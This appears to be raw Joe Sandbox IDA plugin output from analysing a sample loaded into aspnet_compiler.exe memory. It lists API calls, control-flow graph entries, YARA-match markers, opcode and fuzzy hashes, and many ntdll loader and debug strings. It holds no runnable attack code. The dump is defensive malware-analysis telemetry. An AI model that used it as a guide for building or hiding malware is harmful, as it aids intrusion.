                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                          • String ID: N78Im7H$N78Im7H
                                                                                                                                                          • API String ID: 1836367815-367025745
                                                                                                                                                          • Opcode ID: 95fd0b10b958885f51afd5d5c787161506a02b07ac4977fe527e9bc6dfa6409f
                                                                                                                                                          • Instruction ID: 7c822b42a908f8d86cc350d6eef1b7e316cc8cf0ce2d5fa5375f74fd3ec7ff18
                                                                                                                                                          • Opcode Fuzzy Hash: 95fd0b10b958885f51afd5d5c787161506a02b07ac4977fe527e9bc6dfa6409f
                                                                                                                                                          • Instruction Fuzzy Hash: C2F049B262060C29E7215D780C85DF7770C8A09236B0443ABE664863E2D2969EC1C758

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 387 42c0e3-42c121 call 404593 call 42cf73 RtlFreeHeap
                                                                                                                                                          APIs
                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,55CCCCC3,00000007,00000000,00000004,00000000,004168EC,000000F4), ref: 0042C11C
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                          • Opcode ID: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                                                                                                                          • Instruction ID: d601fce2e6cfc47c523398d08e96a68e9c79fc9ca5f02ac62e6cc3558dbc2de4
                                                                                                                                                          • Opcode Fuzzy Hash: d04050c8db7351cb7c42311d341b67d43b6c02a65ccfbd1526b30e449c1422bb
                                                                                                                                                          • Instruction Fuzzy Hash: D4E0EDB2244214BBD614EF99DC41F9B77ADDFC9714F004459FA08A7281D674BD14CAB8

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 382 42c0a3-42c0e1 call 404593 call 42cf73 RtlAllocateHeap
                                                                                                                                                          APIs
                                                                                                                                                          • RtlAllocateHeap.NTDLL(?,0041DE11,?,?,00000000,?,0041DE11,?,?,?), ref: 0042C0DC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                          • Opcode ID: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                                                                                                                          • Instruction ID: e057fd75638c54c2a83d139f9191c8a4f81c752b1f28dea9c101fe2514506ad0
                                                                                                                                                          • Opcode Fuzzy Hash: 53b584e200e5f2eb778bd4060701bbb0a480973bbaf0056c1c6602fc846fd21c
                                                                                                                                                          • Instruction Fuzzy Hash: 68E06DB1204204BBDA14EE99EC41FAB37ACEFC9714F104019FA08A7281C674BD1487F8

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 397 42c123-42c15c call 404593 call 42cf73 ExitProcess
                                                                                                                                                          APIs
                                                                                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,53CBBDCC,?,?,53CBBDCC), ref: 0042C157
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                          • Opcode ID: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                                                                                                                          • Instruction ID: 5b3de0624fe0a28c818fb70999a8e3532c71153bdfbe5aac28f931c41c5855af
                                                                                                                                                          • Opcode Fuzzy Hash: 29205141e20994605a55deee26b2df85bd7a3aaca56f5563100d8efa15c00275
                                                                                                                                                          • Instruction Fuzzy Hash: 10E086352402147BC610EB5ADC41F9B776CDFC5714F108419FA0CA7181C671BA1487F4

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 402 1092c0a-1092c0f 403 1092c1f-1092c26 LdrInitializeThunk 402->403 404 1092c11-1092c18 402->404
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                          • Opcode ID: eb5e2c7d5b9bfb8c91e983d935f37447737de0718e461d41310d63120d220f43
                                                                                                                                                          • Instruction ID: 528b5f0fb4abad2e016703dfbc173ca70aadcbb32d6789c82e8ace61873b3288
                                                                                                                                                          • Opcode Fuzzy Hash: eb5e2c7d5b9bfb8c91e983d935f37447737de0718e461d41310d63120d220f43
                                                                                                                                                          • Instruction Fuzzy Hash: 3BB09BB1D055C5D5EF51E7E44618717794077D0701F55C062D2430651F8738D1D1F275
                                                                                                                                                          Strings
                                                                                                                                                          • Go determine why that thread has not released the critical section., xrefs: 01108E75
                                                                                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01108E02
                                                                                                                                                          • *** Inpage error in %ws:%s, xrefs: 01108EC8
                                                                                                                                                          • The critical section is owned by thread %p., xrefs: 01108E69
                                                                                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01108F34
                                                                                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01108F26
                                                                                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01108DB5
                                                                                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01108F2D
                                                                                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01108DA3
                                                                                                                                                          • The resource is owned shared by %d threads, xrefs: 01108E2E
                                                                                                                                                          • read from, xrefs: 01108F5D, 01108F62
                                                                                                                                                          • write to, xrefs: 01108F56
                                                                                                                                                          • This failed because of error %Ix., xrefs: 01108EF6
                                                                                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01108E3F
                                                                                                                                                          • The instruction at %p tried to %s , xrefs: 01108F66
                                                                                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01108E86
                                                                                                                                                          • *** then kb to get the faulting stack, xrefs: 01108FCC
                                                                                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01108E4B
                                                                                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01108DC4
                                                                                                                                                          • *** enter .exr %p for the exception record, xrefs: 01108FA1
                                                                                                                                                          • The instruction at %p referenced memory at %p., xrefs: 01108EE2
                                                                                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01108DD3
                                                                                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01108FEF
                                                                                                                                                          • <unknown>, xrefs: 01108D2E, 01108D81, 01108E00, 01108E49, 01108EC7, 01108F3E
                                                                                                                                                          • *** enter .cxr %p for the context, xrefs: 01108FBD
                                                                                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01108D8C
                                                                                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01108F3F
                                                                                                                                                          • The resource is owned exclusively by thread %p, xrefs: 01108E24
                                                                                                                                                          • an invalid address, %p, xrefs: 01108F7F
                                                                                                                                                          • a NULL pointer, xrefs: 01108F90
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                                          • API String ID: 0-108210295
                                                                                                                                                          • Opcode ID: d2d1ab021984c3dfbcd2c09d0b39cee423a0c8b3f8df896aff4cc46628bf79ff
                                                                                                                                                          • Instruction ID: bea0d7374936c67e1f7764422a37d8c5c1b96bef7e97f2a72ae9d0145f4d9cb2
                                                                                                                                                          • Opcode Fuzzy Hash: d2d1ab021984c3dfbcd2c09d0b39cee423a0c8b3f8df896aff4cc46628bf79ff
                                                                                                                                                          • Instruction Fuzzy Hash: 65810BB9E44225BFDB1A9A19CC85EBB3B35EF56710F054058F2895F192E3F18811CB62
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-2160512332
                                                                                                                                                          • Opcode ID: 217992627d38281d13063aa168d6bb0ea3c2942e0859ec16e8c5e2b5ac0954b8
                                                                                                                                                          • Instruction ID: 91de447d0447a089c754daff0026224545326f2e1158819303e7e203b93b3c85
                                                                                                                                                          • Opcode Fuzzy Hash: 217992627d38281d13063aa168d6bb0ea3c2942e0859ec16e8c5e2b5ac0954b8
                                                                                                                                                          • Instruction Fuzzy Hash: 54926C71608346AFE725DE28C880BABB7E8BF84754F04496DFAD4DB251D770E844CB92
                                                                                                                                                          Strings
                                                                                                                                                          • double initialized or corrupted critical section, xrefs: 010C5508
                                                                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010C54E2
                                                                                                                                                          • Address of the debug info found in the active list., xrefs: 010C54AE, 010C54FA
                                                                                                                                                          • 8, xrefs: 010C52E3
                                                                                                                                                          • corrupted critical section, xrefs: 010C54C2
                                                                                                                                                          • undeleted critical section in freed memory, xrefs: 010C542B
                                                                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010C54CE
                                                                                                                                                          • Critical section address., xrefs: 010C5502
                                                                                                                                                          • Invalid debug info address of this critical section, xrefs: 010C54B6
                                                                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010C540A, 010C5496, 010C5519
                                                                                                                                                          • Critical section address, xrefs: 010C5425, 010C54BC, 010C5534
                                                                                                                                                          • Thread identifier, xrefs: 010C553A
                                                                                                                                                          • Critical section debug info address, xrefs: 010C541F, 010C552E
                                                                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 010C5543
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                          • API String ID: 0-2368682639
                                                                                                                                                          • Opcode ID: e78117ff42ab74f5466546b6a388140398eeeac782987dc8536f2fe549a3ae86
                                                                                                                                                          • Instruction ID: 7bd3e1d429b3b6a365ffce05af013b7bf5dcc0d61eb77042356b99de52e387b1
                                                                                                                                                          • Opcode Fuzzy Hash: e78117ff42ab74f5466546b6a388140398eeeac782987dc8536f2fe549a3ae86
                                                                                                                                                          • Instruction Fuzzy Hash: 1D818CB4A00359AFDB60CF99CC45BAEBBF9BB48B14F10819EF584BB640D771A940CB50
                                                                                                                                                          Strings
                                                                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 010C2624
                                                                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 010C2498
                                                                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 010C2506
                                                                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 010C2602
                                                                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 010C2412
                                                                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010C25EB
                                                                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010C22E4
                                                                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 010C2409
                                                                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010C24C0
                                                                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 010C261F
                                                                                                                                                          • @, xrefs: 010C259B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                          • API String ID: 0-4009184096
                                                                                                                                                          • Opcode ID: 7ecc2a32161704b0c4c1c30110338fa6d6c4771f40d182095db62d7f045919fb
                                                                                                                                                          • Instruction ID: 35c15f35b9d869d143f8776ba90d138ac2f9e10ed02e86e508d008e8073a7beb
                                                                                                                                                          • Opcode Fuzzy Hash: 7ecc2a32161704b0c4c1c30110338fa6d6c4771f40d182095db62d7f045919fb
                                                                                                                                                          • Instruction Fuzzy Hash: B2026FF1D0422D9FDB61DB54CD80BEEB7B8AF54704F0041EAA689A7241DB709E84CF69
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                          • API String ID: 0-2515994595
                                                                                                                                                          • Opcode ID: 38d618e986c259e5fb4d5238fa3ffedec6333954db6c003bbfce787937ad27a9
                                                                                                                                                          • Instruction ID: e1a77a2d2d73cb72c04f8ff99e4db6b88208946ff268ba915f54f23a2257d39a
                                                                                                                                                          • Opcode Fuzzy Hash: 38d618e986c259e5fb4d5238fa3ffedec6333954db6c003bbfce787937ad27a9
                                                                                                                                                          • Instruction Fuzzy Hash: 0651DF715053169BD329DF19C84ABEBBBE8BF94240F14891EEAD8C3681E770D508CBD2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                          • API String ID: 0-3197712848
                                                                                                                                                          • Opcode ID: 98f40dc0eedea1f0765e821b33ba6f8af2315237222f9deb7ca5908e6e2ea016
                                                                                                                                                          • Instruction ID: d0b29cd84be10a69fe010ea158194ec45df08708db82d657d16e44c11eb3b143
                                                                                                                                                          • Opcode Fuzzy Hash: 98f40dc0eedea1f0765e821b33ba6f8af2315237222f9deb7ca5908e6e2ea016
                                                                                                                                                          • Instruction Fuzzy Hash: 7F12C1B1609341CFD365EF18C880BAABBE8BF94B08F04456EF9C59B291E774D944CB52
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                          • API String ID: 0-1700792311
                                                                                                                                                          • Opcode ID: 40521fa0dd51d632695cae8d370af743372e02ea209112f8aa3267214ff3f095
                                                                                                                                                          • Instruction ID: 5ca09acc122b6315057f09719f078e2623af9461e0255f5d019f997add898278
                                                                                                                                                          • Opcode Fuzzy Hash: 40521fa0dd51d632695cae8d370af743372e02ea209112f8aa3267214ff3f095
                                                                                                                                                          • Instruction Fuzzy Hash: F5D1F335900685EFDB2ADFA8C440BADBBF1FF4A740F098069F4859B692C7B5D981CB14
                                                                                                                                                          Strings
                                                                                                                                                          • VerifierDebug, xrefs: 010D8CA5
                                                                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 010D8B8F
                                                                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 010D8A3D
                                                                                                                                                          • HandleTraces, xrefs: 010D8C8F
                                                                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 010D8A67
                                                                                                                                                          • VerifierFlags, xrefs: 010D8C50
                                                                                                                                                          • VerifierDlls, xrefs: 010D8CBD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                          • API String ID: 0-3223716464
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                          • API String ID: 0-1109411897
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-792281065
                                                                                                                                                          Strings
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 010A9A11, 010A9A3A
                                                                                                                                                          • Loading the shim user DLL failed with status 0x%08lx, xrefs: 010A9A2A
                                                                                                                                                          • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 010A99ED
                                                                                                                                                          • LdrpInitShimEngine, xrefs: 010A99F4, 010A9A07, 010A9A30
                                                                                                                                                          • Getting the shim user exports failed with status 0x%08lx, xrefs: 010A9A01
                                                                                                                                                          • apphelp.dll, xrefs: 01046496
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-204845295
                                                                                                                                                          Strings
                                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 010C2180
                                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010C21BF
                                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 010C2165
                                                                                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 010C2160, 010C219A, 010C21BA
                                                                                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 010C219F
                                                                                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 010C2178
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                          • API String ID: 0-861424205
                                                                                                                                                          Strings
                                                                                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 010C81E5
                                                                                                                                                          • LdrpInitializeProcess, xrefs: 0108C6C4
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0108C6C3
                                                                                                                                                          • LdrpInitializeImportRedirection, xrefs: 010C8177, 010C81EB
                                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 010C8181, 010C81F5
                                                                                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 010C8170
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                          • API String ID: 0-475462383
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 01092DF0: LdrInitializeThunk.NTDLL ref: 01092DFA
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01090BA3
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01090BB6
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01090D60
                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01090D74
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1404860816-0
                                                                                                                                                          Strings
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                          • API String ID: 0-379654539
                                                                                                                                                          Strings
                                                                                                                                                          • LdrpInitializeProcess, xrefs: 01088422
                                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01088421
                                                                                                                                                          • @, xrefs: 01088591
                                                                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0108855E
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                          • API String ID: 0-1918872054
                                                                                                                                                          Strings
                                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 010C21DE
                                                                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010C21D9, 010C22B1
                                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010C22B6
                                                                                                                                                          • .Local, xrefs: 010828D8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000B.00000002.2540920666.0000000001020000.00000040.00001000.00020000.00000000.sdmp, Offset: 01020000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_11_2_1020000_aspnet_compiler.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                          Strings
                                                                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 010C342A
